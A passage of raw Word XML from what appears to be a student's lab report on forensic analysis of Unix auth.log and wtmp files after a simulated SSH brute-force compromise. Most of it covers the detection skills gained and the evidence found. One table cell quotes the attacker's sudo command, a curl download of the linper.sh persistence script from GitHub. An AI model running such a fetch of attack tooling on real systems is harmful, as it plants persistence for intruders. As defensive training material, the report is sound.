                <w:color w:val="1B3A6B"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Full Command (executed using sudo)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8103"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3F2FCFB5">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="0D7377"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49C5034E">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E9AC4F">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">V.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>SKILLS AND COMPETENCIES DEVELOPED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A2FEA4">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CF8BBFE">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28274A34">
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Technical Skills  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7416FAD9">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CE1F7A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Unix Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5110D95F">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This lab developed strong proficiency in analyzing Unix authentication logs. The ability to apply </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grep, sort, uniq,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>less</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in combination to extract specific event types from large log files is a foundational SOC skill. Filtering auth.log for SSH events, failed logins, accepted passwords, session IDs, and sudo commands produced targeted, actionable results from a dense log file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF8ECC5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Artefact Correlation — auth.log and wtmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B5DA6">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Correlating the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auth.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wtmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> artifacts to distinguish automated brute force activity from manual interactive sessions was a key analytical skill developed in this lab. The one-second difference between the auth.log password acceptance timestamp and the wtmp session establishment timestamp reflects the system’s processing sequence and demonstrates the importance of understanding how these logs relate to each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E71727D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Brute Force Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02037B67">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Identifying a brute force attack through IP frequency analysis, failed login volume, and the characteristic pattern of a session opening and closing within the same second developed practical detection skills directly applicable to SIEM alert triage and log-based threat hunting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB8B100">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Post-Compromise Activity Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9EC9F4">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Tracing the attacker’s post-access activities — account creation, sudo group modification, and remote script download — through auth.log entries developed the ability to reconstruct an attacker’s objectives and methodology from log evidence alone. Each action left a distinct log entry type: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>useradd, usermod, sudo,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>COMMAND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C093EC4">
      <w:pPr>
        <w:spacing w:before="120" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090CBD30">
      <w:pPr>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
        <w:spacing w:before="220" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Analytical Skills  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4710D0">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5494DA92">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Session Attribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3202EF3B">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linking attacker actions across multiple log entries using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session IDs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session 34 vs Session 37) required careful cross-referencing of log timestamps and session numbers. This analytical approach is essential in real SOC investigations where multiple sessions may be active simultaneously on the same system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F589169">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23FB9EA5">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Automated vs. Manual Activity Differentiation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D08F92">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Distinguishing the automated brute force phase (Session 34, opened and closed in the same second) from the manual interactive phase (Session 37, stable connection) required contextual reasoning informed by the log evidence rather than pattern-matching alone. This skill directly supports triage decisions in alert workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A7CB2D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="220" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Framework Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413D24D">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Mapping observed attacker behaviour to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> techniques developed the ability to contextualise log findings within a standardised threat intelligence framework. This skill supports detection rule development, threat hunting hypothesis generation, and incident reporting across Blue Team and DFIR workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F780D4">
      <w:pPr>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60A1CD1E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D7377"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">VI.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B3A6B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>FEEDBACK AND EVIDENCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBFFD8F">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="0D7377" w:sz="6" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57FF0582">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="630852A7">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Although this investigation was conducted in a simulated lab environment, it provided a structured environment for applying and validating forensic analysis techniques against real-world Unix authentication log artifacts. Every finding was derived directly from log evidence, with each conclusion supported by specific log entries, timestamps, and session identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5321A5AC">
      <w:pPr>
        <w:spacing w:before="0" w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The analysis was supported by the following verifiable evidence extracted from the auth.log and wtmp artifacts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556C1838">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">IP frequency analysis confirming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>65.2.161.68</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the brute force source with 165+ failed attempts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278CC815">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.log "Accepted password" event confirming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> account compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E73709F">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">wtmp timestamp confirming manual session established at </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2024-03-06 06:32:45 UTC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F428F">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Session ID comparison (34 vs 37) confirming </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Session 37</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the attacker’s manual interactive session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2EDEC6">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="3A3A3A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">useradd and usermod entries confirming creation of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
